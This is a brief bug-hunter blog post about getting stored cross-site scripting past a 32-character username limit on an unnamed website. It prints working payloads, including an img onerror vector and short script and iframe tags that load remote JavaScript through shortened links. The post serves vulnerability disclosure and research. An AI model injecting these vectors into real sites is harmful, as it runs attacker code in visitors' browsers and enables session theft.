A well-known website had a limit of 32 chars on the user name field that was reflected in the public profile area.
That field allowed XSS exploitation:
d<img src=x onerror=prompt(1)>
Simple right?
But sometimes you need to provide a better vector where the affected company can see more than a prompt with a number. Also they know the limitation of their textfield to 32 chars.
I found two methods using SCRIPT and IFRAME.
When I was tring using this with a tiny URL [is.gd] pointing to my XSS code at davidsopas.com I realized that the vector wasn’t executing.
Why? It required HTTPS.
I searched for a tiny url that provided HTTPS and Google provide me with one – goo.gl.
So my final vector was:
<script src=//goo.gl/TJnzmV> <iframe src=//goo.gl/xWYG4f>
29 chars and you I could use any Javascript I wanted.
It was fun!
You guys have any other method you like to share?